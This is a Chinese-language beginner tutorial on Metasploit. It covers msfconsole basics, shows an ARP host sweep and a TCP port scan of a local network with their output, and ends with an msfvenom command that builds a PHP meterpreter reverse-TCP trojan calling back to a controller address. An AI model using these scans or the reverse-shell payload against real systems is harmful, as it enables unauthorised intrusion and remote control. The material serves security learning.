网络安全msf学习1

2024-03-16 05:44

文章标签 学习网络安全 msf

本文主要是介绍网络安全msf学习1，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

工具：netcat

用途：端口连接、数据提交

工具nmap

用途：端口扫描、服务识别、操作系统指纹识别

工具 httprint

用途：通过远程http指纹判断http服务类型

工具： tamper ie

用途： http数据包修改、转发工具firefox插件

2.MSF命令

msfconsole 进入

0.help /?

1.search help search 搜索

2.info 查看模块详细用法

3.use 使用

show options查看参数

4.set x y 设置参数

set rhost 192.168.0.1

5.run /expoit

6.back 退回主界面

7.quit/exit 退出msf

2.信息收集

用来发现主机的

use auxiliary/scanner/discovery/arp_sweep

例子：

msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):Name       Current Setting  Required  Description----       ---------------  --------  -----------INTERFACE                   no        The name of the interfaceRHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlSHOST                       no        Source IP AddressSMAC                        no        Source MAC AddressTHREADS    1                yes       The number of concurrent threads (max one per host)TIMEOUT    5                yes       The number of seconds to wait for new data

rhosts threads timout是必填项

msf6 auxiliary(scanner/discovery/arp_sweep) > set rhost 192.168.50.1/24
rhost => 192.168.50.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
[+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
[+] 192.168.50.2 appears to be up (HUAWEI TECHNOLOGIES CO.,LTD).
[+] 192.168.50.3 appears to be up (Cisco Systems).
[+] 192.168.50.21 appears to be up (UNKNOWN).
[+] 192.168.50.23 appears to be up (UNKNOWN).
[+] 192.168.50.25 appears to be up (UNKNOWN).
[+] 192.168.50.26 appears to be up (UNKNOWN).
[+] 192.168.50.29 appears to be up (UNKNOWN).
[+] 192.168.50.30 appears to be up (UNKNOWN).
[+] 192.168.50.35 appears to be up (UNKNOWN).
[+] 192.168.50.37 appears to be up (UNKNOWN).
[+] 192.168.50.68 appears to be up (UNKNOWN).
[+] 192.168.50.53 appears to be up (VMware, Inc.).
[+] 192.168.50.74 appears to be up (UNKNOWN).
[+] 192.168.50.96 appears to be up (AIO LCD PC BU / TPV).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 > search portscan

Matching Modules
================#  Name                                              Disclosure Date  Rank    Check  Description-  ----                                              ---------------  ----    -----  -----------0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback LocatorInteract with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):Name         Current Setting  Required  Description----         ---------------  --------  -----------CONCURRENCY  10               yes       The number of concurrent ports to check per hostDELAY        0                yes       The delay between connections, per thread, in millisecondsJITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlTHREADS      1                yes       The number of concurrent threads (max one per host)TIMEOUT      1000             yes       The socket connect timeout in milliseconds

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.50.96
rhosts => 192.168.50.96
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.50.96:        - 192.168.50.96:135 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:139 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:445 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:1027 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:5040 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:8900 - TCP OPEN
[*] 192.168.50.96:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

正向攻击控制机直接控制靶机

反弹攻击控制机打开端口靶机运行木马反向连接控制机

制作木马、获得反弹链接的shell

完整流程如下：

1.msfvenom 生成木马文件

2、msf监听指定端口

3、访问木马文件、获得meterpreter连接

不用启动msf交互终端msfconsole就可以制作木马

使用msfvenom

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=7777 -o shell.php

启动lhost 和lport为控制机地址和端口号。前提是控制机需要开启7777这个端口号的监听程序

这篇关于网络安全msf学习1的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！